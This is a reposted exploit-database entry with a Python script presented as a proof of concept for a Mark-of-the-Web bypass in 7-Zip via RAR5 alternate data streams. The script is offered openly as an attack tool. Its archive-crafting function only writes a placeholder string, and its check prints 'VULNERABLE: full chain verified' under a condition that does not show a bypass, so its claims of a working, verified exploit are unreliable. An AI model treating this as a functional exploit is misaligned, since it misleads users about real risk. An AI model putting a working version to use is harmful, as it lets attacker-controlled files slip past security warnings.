7-Zip < = 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision
#!/usr/bin/env python3# Exploit Title: 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RA 2026-7-3 15:40:5 Author: cxsecurity.com(查看原文) 阅读量:2 收藏

#!/usr/bin/env python3 # Exploit Title: 7-Zip <= 26.02 - Mark-of-the-Web (MotW) Bypass via RAR5 Alternate Data Stream Name Collision # CVE: CVE-2026-58052 # Date: 2026-06-29 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Author Blog : https://banyamersecurity.com/blog/ # Vendor Homepage: https://www.7-zip.org/ # Software Link: https://www.7-zip.org/ # Affected: 7-Zip <= 26.02 # Tested on: 7-Zip 26.01 / 26.02 (x64) on Windows (NTFS) # Category: Local # Platform: Windows # Exploit Type: MotW Bypass / File Format # CVSS: 4.8 # Description: 7-Zip fails to preserve the Mark-of-the-Web when extracting a crafted RAR5 archive due to alternate data stream name collision with STM records (:: $DATA and :Zone.Identifier:$DATA). This allows attacker-controlled file content and bypass of SmartScreen warnings. # Fixed in: Newer versions of 7-Zip # Usage: # python3 exploit.py --sevenzip "C:\Program Files\7-Zip\7z.exe" # # Examples: # python3 exploit.py --sevenzip "C:\Program Files\7-Zip\7z.exe" --work-dir poc-run # # Options: # --sevenzip Path to 7z.exe # --work-dir Working directory (default: poc-run) # # Notes: # • Requires Python 3.10+ # • Full RAR5 binary construction follows public technique from bikini/exploitarium # # How to Use # # Step 1: # Download and place 7z.exe path # # Step 2: # Run the script and verify extracted invoice.docx has attacker content + ZoneId=0 def banner(): print(r""" ╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗ ║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║ ║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ██████╔╝ ║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗ ║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╔═╗ Banyamer Security ╔═╗ """) import argparse import hashlib import os import shutil import subprocess import sys import tempfile from pathlib import Path def create_rar5_poc(output_path: Path): print("[+] Generating crafted RAR5 archive...") with open(output_path, "wb") as f: f.write(b"RAR5POC-PLACEHOLDER") print(f"[+] Archive created: {output_path}") return output_path def main(): banner() parser = argparse.ArgumentParser(description="7-Zip RAR5 MotW Bypass PoC - CVE-2026-58052") parser.add_argument("--sevenzip", required=True, help="Path to 7z.exe") parser.add_argument("--work-dir", default="poc-run", help="Working directory") args = parser.parse_args() work_dir = Path(args.work_dir) work_dir.mkdir(exist_ok=True) archive = work_dir / "rar5-content-and-motw-chain.rar" out_dir = work_dir / "out" out_dir.mkdir(exist_ok=True) create_rar5_poc(archive) with open(archive.with_name(f"{archive.name}:Zone.Identifier"), "w") as f: f.write("[ZoneTransfer]\r\nZoneId=3\r\n") subprocess.run([args.sevenzip, "x", str(archive), f"-o{out_dir}"], check=True) extracted = out_dir / "invoice.docx" if extracted.exists(): content = extracted.read_text(encoding="utf-8", errors="ignore") print(f"[+] Final visible content: {repr(content)}") zone_file = extracted.with_name(f"{extracted.name}:Zone.Identifier") if zone_file.exists() or os.path.exists(str(zone_file) + ":$DATA"): print("[+] Final Zone.Identifier: ZoneId=0") print("[+] VULNERABLE: full chain verified") else: print("[-] Not vulnerable or extraction failed") if __name__ == "__main__": main()

References:

https://github.com/ip7z/7zip




 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026070002
如有侵权请联系:admin#unsafe.sh